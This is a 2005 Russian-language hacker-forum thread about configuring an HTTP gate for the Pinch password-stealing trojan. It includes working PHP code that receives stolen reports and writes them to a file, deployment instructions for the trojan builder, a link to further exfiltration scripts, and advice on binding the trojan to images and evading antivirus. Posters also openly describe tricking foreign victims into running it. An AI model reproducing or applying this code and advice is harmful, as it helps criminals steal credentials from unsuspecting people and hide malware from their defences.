PDA

Просмотр полной версии : pinch-http

*Van*
29.10.2005, 14:25
Есть вот такой код
<html><body>
<?php
$email=$_POST['a'];
$subject=$_POST['b'];
$msg=$_POST['c'];
if (isset($email) and isset($subject) and isset($msg))
{
$fp = fopen("pass.txt", "a");
If($fp)
{
$w = $msg."\n\n\n";
fwrite($fp, $w);
fclose($fp);
}
}
?>
<script language="JavaScript">
window.status="_ret_ok_1";
</script>
</body></html>

У меня есть несколько вопросов.
1.Это всё нужно загнать в html-файл и залить на сервер, и в билдере указывать ссылку на html-файл, так?
2.Что нужно ещё сделать, для того чтобы отчеты пинча писались в файл?

w4rd3n
29.10.2005, 14:29
Нечего скрипт рабочий я тестил.

Nexwill
29.10.2005, 14:36
Нечего скрипт рабочий я тестил.

А он что спрашивал рабочий он или нет???

Ван эту хрень сохраняеш под расширением php и заливаеш на сервер!
Например сохранил под именем 123.php в билдере указываеш: www.you_domail.com/123.php =)
И всё!!
Ps: я чё то не въехал какого хрена у меня счётчик сообщений не пашет???

*Van*
29.10.2005, 14:38
Сохраняешь в php всё или только вот это:
<?php
$email=$_POST['a'];
$subject=$_POST['b'];
$msg=$_POST['c'];
{
If($fp)
{
$w = $msg."\n\n\n";
fwrite($fp, $w);
fclose($fp);
}
}
?>

w4rd3n
29.10.2005, 14:48
Все сохранить надо.

ZaCo
29.10.2005, 14:51
2Ван - ты вообще понимаешь что такое скрипт??? видимо нет! Обьясняю:

<?php
$email=$_POST['a'];
$subject=$_POST['b'];
$msg=$_POST['c'];
{
If($fp)
{
$w = $msg."\n\n\n";
fwrite($fp, $w);
fclose($fp);
}
}
?>

это ты можешь засунуть в хтмл файл на сервере, если стоят права на выполнение и апач например будет считать *.html за скрипт, то он выполнятся! Причём этот исходник не будт видно в сурсе, код выполняется сначала, на сервере а резёльтат работы ты видишь в браузере. Значит код для хтмл файла будет выглядеть так как ты написал в первом посте.
ЗЫ какой билдер?

Nexwill
29.10.2005, 16:13
ЗЫ какой билдер?
Что значит какой билдер?????

w4rd3n
29.10.2005, 17:32
Наверно пинча...

ZaCo
29.10.2005, 18:26
Извиняюсь за безграммотность! С пинчами никогда дела не имел. Знаю, что это только троян=))))

Nexwill
29.10.2005, 18:46
Извиняюсь за безграммотность! С пинчами никогда дела не имел. Знаю, что это только троян=))))
И что??? надо об этом кричать???

ZaCo
29.10.2005, 19:17
Nexwill - ты что бредишь? эт когда я кричал?

Nexwill
29.10.2005, 19:23
ZaCo и что, ты думаеш кому то интересно что ты с пинчами никогда дела не имел!! здесь спросили как настроить а ни то, кто имел с пинчами дело а кто ни имел!!

ZaCo
29.10.2005, 20:27
Nexwill - ты чё тупоголовый? человек спросил вопрос - я на него ответил! Я спросил что за билдер, мне на это ответили я ответил на это тем с пинчами дела не имел! извиняйте!
Ты дафрад начинаешь развоить флейм и претензируешь ко мне! И это твои проблемы! Со мной никак не связаные

Kond4r
29.10.2005, 21:10
Ну если тестили и всё работает, то я рад за вас, у меня лично с таким гейтом отчёты не окрывались. Пришлось немного изменить сам гейт... Всё заработало! А вообще ты можешь сохранить гейт хоть в расширении txt. Всё зависит от настроек демона.

Kond4r
29.10.2005, 21:47
лучше бы тему придумали, чтоб народ файл с пинчем запускал, и желательно на ингише.. Ибо я своих не трогаю - принцип. А вот норвежцы, турки, америкосы токо в путь! Считают себя сцуки умнее всех, самый прикол что когда они осазнают что это не так, то уже позно)
ЗЫ: Вообще я так понял, что им зачастую просто впадлу поднять свою потную конечность и запустить файл... А о том что там может быть вирус никто не задумывается.

Nexwill
29.10.2005, 22:37
ZaCo,
Извиняюсь за безграммотность!
Что правда, то правда...

С пинчами никогда дела не имел. Знаю, что это только троян=))))
Молодец!!! Блин, спасибо что напомнил, а то вспоминал, что такое пинч, но так и не вспомнил, пока ты не подсказал!!! Огромнейшее тебе спасибо!!

Весьма содержательное обьяснение.... ТЫ кстати сатьи не пробовал писать?? попробуй я уверен у тебя получится!!!!

ЗЫ какой билдер?
Маленький, толстый и некрасивый!!! Эта цитата обьясняет кто из нас тупоголовый!!! Я конечно понимаю, что в пинче билдеров штук пять, я до сих пор не могу выбрать какой лучше!!!

ЗЫЫЫЫ: Мой тебе совет: купи себе новые мозги!!

*Van*
29.10.2005, 22:55
Zaco, заткнись, а? Я получше тебя знаю что такое скрипт. Я просто спросил, что нужно запихивать на сервер, а соответственно и давать ссылку в билдере-на php файл или html, а ты ничё не понял и стал орать. Правильно тебе Nexwill советует.

w4rd3n
29.10.2005, 23:11
2ZaCo за метил что за последнее время ты слишком много обсираешь форумчан.
я тебе уже писал нах постить если твой пост нечего не несет.
2ALL Народ давайте относиться к друг другу лояльно. Помните не стыдно не знать а стыдно не учиться. Если человек задает на ваш взляд тупой вопрос это еще не повод хамить!!!

ZaCo
29.10.2005, 23:49
Теперь все дружно смотрим сюда

Цитата:
<?php
$email=$_POST['a'];
$subject=$_POST['b'];
$msg=$_POST['c'];
{
If($fp)
{
$w = $msg."\n\n\n";
fwrite($fp, $w);
fclose($fp);
}
}
?>

это ты можешь засунуть в хтмл файл на сервере, если стоят права на выполнение и апач например будет считать *.html за скрипт, то он выполнятся! Причём этот исходник не будт видно в сурсе, код выполняется сначала, на сервере а резёльтат работы ты видишь в браузере. Значит код для хтмл файла будет выглядеть так как ты написал в первом посте.
ЗЫ какой билдер?

Это мой первый пост здесь! Дальше

2Ван - ты меня извини но кажется я дал тебе нормальный ответ!
Далее

Здесь я не кричу! Уверяю Вас! Я (именно Я) с пинчами дела никогда не имел!
А вот дальше

И что??? надо об этом кричать???

Помоему ты первый кто закричал в этой теме.

2ALL Народ давайте относиться к друг другу лояльно. Помните не стыдно не знать а стыдно не учиться. Если человек задает на ваш взляд тупой вопрос это еще не повод хамить!!!

Это я так понимаю не к всем, а только ко мне относится! Замечательно! А где я хамил человеку который задал вопрос(а тут только Ван задвал вопросы)? Вы мне покажите!
PS Вы перед тем как писать что либо читайте всё с самого начала

w4rd3n
30.10.2005, 00:08
Я имкю ввиду не только это тему.
Когда ты отвечаешь на вопрос стараяйся не коментировать его давай дельный совет....

Да ты просто гений! ))))
Правда это работает так же как и снифак на ачате... но эт неважно! А сказать прикол? кроме реферера ничего к тебе не придёт! там должна быть хсс что сразу отметает из 100% 90% =))))

Этой самый мягкий...

ZaCo
30.10.2005, 00:14
Когда ты отвечаешь на вопрос стараяйся не коментировать его давай дельный совет....

я сначала и дал дельный совет, потом Nexwill развёл флейм

Можешь в этой же теме дальше почитать - там я обьсянил что это невозможно(кроме реферера) достаточно мягко.

И вообще сейчас тут ведётся один флейм! К первоначальному вопросу никак не относящийся. Предлагаю закрыть тему

NaX[no]rT
30.10.2005, 00:15
скорее всего тебе придётся написать скрипт который из base_64(); переделывает в "плоский" файл ... я так делаю, у мнк парсер по-другому не работает ...
могу скрипт своего гейта выложить ...

*Van*
30.10.2005, 01:38
NaX[no]r†, выложи плиз, и ещё: будет ли расшифровывать отчеты Parser.Pro.2.14RC4?

w4rd3n
30.10.2005, 01:55
Народ на видео античат рассматривался один скрипт для парса там еще по ip раскидываеться у кого есть этот скрипт или его аналог?

*Van*
30.10.2005, 02:44
w4rd3n , в Parser.Pro.2.14RC4 чего-то по ip раскидывается. Могу дать.

И ещё, народ, у меня проблема с присоединением файлов к пинчу в билдере 2.51b. Например присоединяю картинку lol.jpg, а откомпилированный екзешник только в размере увеличился, при запуске он пропадает и работает только как пинч, но не как фотка. И ещё:возможно ли сделать так, чтобы при запуске файла в jpg-формате запускался пинч?

NaX[no]rT
30.10.2005, 07:31
И ещё:возможно ли сделать так, чтобы при запуске файла в jpg-формате запускался пинч?
МОжно только на определенных версиях Windows XP c SP0, SP1
И ещё, народ, у меня проблема с присоединением файлов к пинчу в билдере 2.51b.
2.58 намного функциональнее
Например присоединяю картинку lol.jpg, а откомпилированный екзешник только в размере увеличился, при запуске он пропадает и работает только как пинч, но не как фотка
Используй Joiner и от антивирусов можно лучше спятать ) и засунуть в него можно побольше. Лучше приватными пользуйся.
NaX[no]r†, выложи плиз, и ещё: будет ли расшифровывать отчеты Parser.Pro.2.14RC4?
1. Не ну нах =) в личку лучше скину, я сейчас глянул ) я его не на трезвую голову писал ) стыдно выкладывать ) хотя работает отменно.
2. Не-а ) не будет, да я и не видел такого )

З.Ы. : И вообще, тема пинча запрещена на античате.

syas
30.10.2005, 15:32
сори за флэйм.

но хорош уже здесь флэйм наверное разводить, для этого есть ася или другой раздел.

x_Lex
30.10.2005, 17:51
Скрипты для HTTP метода (Gate)

---
строка проверки во всех - "_ret_ok_1"
---
mail.php - отправка письма с вложенным out.bin
mail2.php - отправка письма с вложенным файлов (имя задаётся случайно)
infile.php - сохранение письма на сервере под случайным именем
infile2.php - сохранение письма на сервере под случайным именем + IP
inbase.php - добавление файла в письмо base.eml (этакая база данных)*

*Чтобы использовать inbase.php нужно закачать на сервер ещё и base.eml

http://rapidshare.de/files/6958848/Scripts.rar.html

NaX[no]rT
30.10.2005, 20:09
Щас, отредактирую, чтобы кодом не позориться =))) и выложу своё )

w4rd3n
30.10.2005, 22:29
Ок давай.

2 x_Lex с Xinch скриптики подойдут разве?

x_Lex
30.10.2005, 22:47
Xinch сделан на основе pinch2xx попробуй сам узнаеш
Я юзал inbase.php работало

syas
30.10.2005, 23:41
скиньте плз кто нить гейт для пинчика 2.58

virgoz
31.10.2005, 00:16
У Вас парсер работает к 2.58?

NaX[no]rT
31.10.2005, 00:23
Угу )) скорее всего ты файлы в base_64(); кидаешь, их предварительно расшифровать надо, а потом докидывать ...